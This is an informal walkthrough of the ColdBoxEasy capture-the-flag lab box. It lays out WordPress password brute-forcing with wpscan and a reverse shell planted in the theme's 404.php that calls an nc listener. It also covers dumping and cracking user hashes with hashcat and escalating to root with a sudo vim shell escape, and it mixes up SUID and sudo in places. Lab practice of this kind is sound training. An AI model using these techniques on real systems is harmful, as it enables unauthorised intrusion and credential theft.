This walkthrough is for the box ColdBoxEasy on Proving Grounds at: https://portal.offsec.com/labs/play
Basically, start your VPN connection, start the box on Proving Grounds and start targeting it.
Synopsis:
– Nmap, find open port and word press
– wpscan to crack c0ldd’s password
– Log in, create a 404.php in theme editor for 404, then call it with something like http://target/whatever
– It dials back into my waiting netcat listener: nc -nvlp 4444
– Cat /home/c0ldd/local.txt for flag 1
– Find SUID bits and vim -c ‘:!/bin/sh’ gave me root
– There’s a base64 string but it’s useless in /home/c0ldd/users.txt. It’s amusing but decode with cat [base64] |base64 -d to see it
– Fun box
Host: Linux ColddBox-Easy 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
IP Address: 192.168.205.239
Open Ports:
80
443
445
3306
Usernames: c0ldd, philip, hugo and probably others
Spotted Vulns: wpscan vs http://target/wp-admin login
Flag Value: [hidden – go find it for yourself]
Proof Value: Found in /root/ as flag.txt
Notes:
In the target/hidden/index.html is this:
C0ldd, you changed Hugo’s password, when you can send it to him so he can continue uploading his articles. Philip
Three usernames
wpscan –url http://192.168.205.239 -U c0ldd -P /usr/share/wordlists/rockyou.txt
[!] Valid Combinations Found:
| Username: c0ldd, Password: [Hidden. Go get it!]
Log in to Word Press with those creds, w(were you’re admin) and went to Appearance, editor.
Edited the 404.php file with a php reverse shell, then called it with http://target/?m=202011, which doesn’t exist, eliciting the 404 page which then dialed home to my awaiting nc listener.
Priv esc:
Inside the /var/www/html is wp-config.php with usernames and password for mysql database
Use these command in mysql: show databases; show tables; select * from wp_users;
——-+———————+————-+——————–+
| 1 | c0ldd | $P$BJs9aAEh2WaBXC2zFhhoBrDUmN1g0i1 | c0ldd | c0ldd@localhost.com | | 2020-09-24 15:06:57 |0 | the cold in person |
| 2 | hugo | $P$B2512D1ABvEkkcFZ5lLilbqYFT1plC/ | hugo | hugo@localhost.com | | 2020-09-24 15:48:13 |0 | hugo |
| 4 | philip | $P$BXZ9bXCbA1JQuaCqOuuIiY4vyzjK/Y. | philip | philip@localhost.com | | 2020-10-19 17:38:25 |0 | philip |
Also, in the wp-admin file under /var/www/html/wp-admin you see some passwords (Which I hid)
// MySQL settings – You can get this info from your web host //
/ The name of the database for WordPress */
define(‘DB_NAME’, ‘colddbox’);
/ MySQL database username */
define(‘DB_USER’, ‘c0ldd’);
:
/ MySQL database password */
define(‘DB_PASSWORD’, ‘[hidden]’);
/ MySQL hostname */
define(‘DB_HOST’, ‘localhost’);
Ok, got in with mysql -u colddbox / cybersecurity.
Found colddbox database with wp_users table and:
$P$BJs9aAEh2WaBXC2zFhhoBrDUmN1g0i1
echo ‘$P$BJs9aAEh2WaBXC2zFhhoBrDUmN1g0i1’ > hash.txt
hashcat -m 400 -a 0 hash.txt /usr/share/wordlists/rockyou.txt –force
There are no user accounts called hugo or philip but we can use the c0ldd account and su l + password
hash-hugo shows: [Hidden]
hash-philip shows: (Killed hashcat b/c it wasn’t necessary and was taking 100% CPU)
hash-c0ldd is: cybersecurity. su c0ldd and I have access to his files in /home/c0ldd
Found users.txt with base64 string: RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==
Felicidades, primer nivel conseguido! (Congratulations, first level achieved!)
We already go tthe flag tho so lol
Anyhow, I found somewhere to try this:
sudo vim -c ‘:!/bin/sh’ and it gave me root so, cd /root/ and cat proof.txt
How that happens:
sudo : You’re running the command as root (because hugo had sudo rights — likely to run vim without a password).
vim -c : You’re telling Vim to run a command at startup.
:! : This is a Vim shell escape — it spawns a subshell from inside Vim.
/bin/sh : So you’re saying, “run a shell… as root.”
Which gives you:
id uid=0(root) gid=0(root) groups=0(root)
Why It Works: SUID bit binaries
This exploit works only if the user is allowed to run vim as root via sudo , like:
sudo -l
User hugo may run the following commands on target:
(ALL) NOPASSWD: /usr/bin/vim
Since Vim can run arbitrary shell commands, and it’s running as root , you get a root shell .
Safer Alternative in Real Environments
This is why giving users sudo vim or sudo less is basically giving them root. It’s a classic GTFOBins move.